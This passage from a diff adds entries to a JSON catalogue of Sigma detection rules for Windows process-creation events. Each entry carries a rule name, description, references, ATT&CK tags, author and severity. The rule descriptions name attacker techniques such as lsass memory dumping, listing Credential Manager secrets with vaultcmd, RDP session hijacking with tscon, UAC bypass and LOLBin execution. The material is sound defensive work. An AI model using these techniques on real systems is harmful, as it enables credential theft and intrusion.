adselfservice plus exploitation)", + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/22", + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "value": "Suspicious Shells Spawn by SQL Server", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" + ], + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2020/12/11", + "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", + "author": "FPT.EagleEye Team, wagga", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "value": "Suspicious Processes Spawned by WinRM", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/05/20", + "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "level": "high", + "falsepositive": [ + "Legitimate WinRM usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "uuid": "b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush", + "meta": { + "refs": [ + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2021/02/01", + "filename": "proc_creation_win_susp_shimcache_flush.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use of the commandline to shutdown or reboot windows", + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_shutdown.yml", + "author": "frack113", + "level": 
"medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_susp_splwow64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process", + "meta": { + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/07/11", + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Possible Squirrel Packages Manager as Lolbin", + "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", + "value": "Squirrel Lolbin", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", + "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/11/12", + "filename": "proc_creation_win_susp_squirrel_lolbin.yml", + "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "1Clipboard", + "Beaker Browser", + "Caret", + "Collectie", + "Discord", + "Figma", + "Flow", + "Ghost", + "GitHub Desktop", + "GitKraken", + "Hyper", + "Insomnia", + "JIBO", + "Kap", + "Kitematic", + "Now Desktop", + "Postman", + "PostmanCanary", + "Rambox", + "Simplenote", + "Skype", + "Slack", + "SourceTree", + "Stride", + "Svgsus", + "WebTorrent", + "WhatsApp", + "WordPress.com", + "Atom", + "Gitkraken", + "Slack", + "Teams" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "value": "Suspicious SSH Port Forwarding", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + 
"attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/10/12", + "filename": "proc_creation_win_susp_ssh_port_forward.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/10/12", + "filename": "proc_creation_win_susp_ssh_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious svchost process start", + "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "value": "Suspicious Svchost Process", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2017/08/15", + "filename": "proc_creation_win_susp_svchost.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the 
process memory space.", + "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", + "value": "Suspect Svchost Activity", + "meta": { + "refs": [ + "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2019/12/28", + "filename": "proc_creation_win_susp_svchost_no_cli.yml", + "author": "David Burkett", + "level": "high", + "falsepositive": [ + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "value": "Sysprep on AppData Folder", + "meta": { + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2018/06/22", + "filename": "proc_creation_win_susp_sysprep_appdata.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": 
"Suspicious Execution of Systeminfo", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2022/01/01", + "filename": "proc_creation_win_susp_systeminfo.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "value": "Suspicious SYSTEM User Process Creation", + "meta": { + "refs": [ + "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/20", + "filename": "proc_creation_win_susp_system_user_anomaly.yml", + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "level": "high", + "falsepositive": [ + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2288", + 
"https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2018/04/09", + "filename": "proc_creation_win_susp_sysvol_access.yml", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2022/01/30", + "filename": "proc_creation_win_susp_takeown.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory", + "meta": { + "refs": [ + 
"https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ], + "creation_date": "2021/11/24", + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "value": "Suspicious Execution of Taskkill", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_susp_taskkill.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. 
Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2021/12/11", + "filename": "proc_creation_win_susp_tasklist_command.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2018/03/18", + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a process from Windows task manager", + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2018/03/13", + "filename": 
"proc_creation_win_susp_taskmgr_parent.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_susp_tracker_execution.yml", + "author": "Avneet Singh @v3t0_, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "value": "Process Access via TrolleyExpress Exclusion", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/02/10", + "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", 
+ "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM", + "meta": { + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2018/03/17", + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON", + "meta": { + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2018/03/17", + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": 
"TrustedPath UAC Bypass Pattern", + "meta": { + "refs": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2021/08/27", + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious child process of userinit", + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child Process", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2019/06/17", + "filename": "proc_creation_win_susp_userinit_child.yml", + "author": "Florian Roth (rule), Samir Bousseaden (idea)", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of CSharp interactive console by PowerShell", + "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "value": "Suspicious Use of CSharp Interactive Console", + "meta": { + "refs": [ + "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1127" + ], + "creation_date": "2020/03/08", + "filename": "proc_creation_win_susp_use_of_csharp_console.yml", + "author": "Michael R. (@nahamike01)", + "level": "high", + "falsepositive": [ + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2020/10/10", + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "author": "Agro (@agro_sev) oscd.community", + "level": "medium", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "author": "Agro (@agro_sev) oscd.communitly", + "level": "medium", + "falsepositive": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" + ], + "tags": [ + "attack.t1218" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "author": "Agro (@agro_sev) oscd.community", + "level": "low", + "falsepositive": [ + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", + "author": "Agro (@agro_sev), Ensar \u015eamil (@sblmsrsn), oscd.community", + "level": "medium", + "falsepositive": [ + "The process spawned by vsjitdebugger.exe is uncommon." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/04/08", + "filename": "proc_creation_win_susp_vaultcmd.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "value": "Suspicious VBoxDrvInst.exe Parameters", + "meta": { + "refs": [ + 
"https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_susp_vboxdrvinst.yml", + "author": "Konstantin Grishchenko, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": "Suspicious VBScript UN2452 Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + 